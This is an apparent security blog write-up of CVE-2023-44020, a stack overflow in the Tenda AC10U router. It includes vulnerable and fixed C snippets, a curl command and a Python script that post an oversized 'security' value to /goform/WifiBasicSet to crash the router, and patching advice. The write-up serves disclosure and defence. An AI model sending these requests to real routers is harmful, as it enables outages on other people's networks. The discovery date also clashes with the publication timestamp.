In late 2023, security researchers discovered a serious vulnerability—CVE-2023-44020—in the Tenda AC10U router, version 1., specifically the firmware US_AC10UV1.RTL_V15.03.06.49_multi_TDE01. This bug allows attackers to perform a stack overflow attack through the security parameter in the formWifiBasicSet function. Here’s what you need to know, how it works, and a walk-through demonstration.

What is Tenda AC10U?

The Tenda AC10U is a popular home and office Wi-Fi router favored for its affordability and features. However, like most IoT devices, it's also a potential target if vulnerabilities are discovered and left unpatched.

Technical Analysis

The bug lies in how the router’s web management portal handles the security parameter inside the formWifiBasicSet function. If a user sends an overlong string for this parameter, the system does not properly check the length, leading to a stack overflow.

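Below is a simplified look at the vulnerable code:

```c
#include <string.h>

/* Placeholder declarations so the simplified listing is self-consistent;
   the real firmware types and helpers differ. */
typedef struct request request_t;
const char *get_cgi_param(request_t *req, const char *name);

void formWifiBasicSet(request_t *req) {
    char security[64];
    // ... other declarations

    // User input copied without length checking!
    strcpy(security, get_cgi_param(req, "security")); // unsafe!

    // Carry on with processing...
}
```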
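For comparison, here is the same copy with the length check the handler lacks, written as an added example that is not Tenda's code and not part of the original write-up. The names `copy_param` and `wifi_basic_set_checked` and the sample value `wpa2` are hypothetical; the 64-byte buffer size comes from the simplified listing.

```c
/* Added example: bounded replacement for the unchecked strcpy().
 * All names are hypothetical, not Tenda firmware symbols. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SECURITY_BUF_LEN 64   /* size of the buffer in the simplified listing */

enum param_status { PARAM_OK = 0, PARAM_MISSING = -1, PARAM_TOO_LONG = -2 };

/* Copy an untrusted CGI value into a fixed buffer. Oversized input is
 * rejected rather than truncated, so nothing is written past dst_len. */
static enum param_status copy_param(char *dst, size_t dst_len, const char *src)
{
    if (dst == NULL || dst_len == 0)
        return PARAM_MISSING;
    dst[0] = '\0';
    if (src == NULL)
        return PARAM_MISSING;

    /* Look for the terminator only within the space we actually have. */
    const char *end = memchr(src, '\0', dst_len);
    if (end == NULL)
        return PARAM_TOO_LONG;          /* value plus NUL does not fit */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return PARAM_OK;
}

/* Handler sketch: takes the raw parameter value so the example runs alone. */
static enum param_status wifi_basic_set_checked(const char *security_value)
{
    char security[SECURITY_BUF_LEN];
    enum param_status st = copy_param(security, sizeof security, security_value);
    if (st != PARAM_OK)
        return st;                      /* reject the request, e.g. HTTP 400 */
    /* ... continue processing the validated value ... */
    return PARAM_OK;
}

int main(void)
{
    char probe[129];                    /* constructed 128-byte test input */
    memset(probe, 'A', 128);
    probe[128] = '\0';
    printf("128 bytes -> %d\n", wifi_basic_set_checked(probe));
    printf("\"wpa2\"    -> %d\n", wifi_basic_set_checked("wpa2"));
    return 0;
}
```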

1. Send a crafted HTTP request with an extra-long value for the security parameter.

2. The router's web admin endpoint (/goform/WifiBasicSet) processes the request.

Example Exploit (Proof of Concept)

> Warning: Only run this in a test environment! Do not attack devices you do not own or have permission to test.

Here’s an example using curl in bash:

```bash
curl -X POST \
  -d "security=$(python3 -c 'print("A"*128)')" \
  http://ROUTER_IP/goform/WifiBasicSet
```

Or in Python:

```python
import requests

url = 'http://ROUTER_IP/goform/WifiBasicSet'
data = {
    'security': 'A' * 128  # 128 bytes triggers the overflow
}

response = requests.post(url, data=data)
print("Status:", response.status_code)
print("Response:", response.text)
```

Result: The router may crash, reboot, or become unresponsive.

Mitigation

- Update Firmware: Check Tenda's firmware update page for the latest version. If there’s no patch, contact Tenda support.

Final Thoughts

Stack overflows in IoT devices like the Tenda AC10U are serious—especially when exposed to the Internet. Unauthorized users can crash your network or potentially hijack your device, leading to deeper network compromise.

Always patch your devices, restrict remote admin access, and follow basic IoT security advice.

Stay safe online!

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:45:01 UTC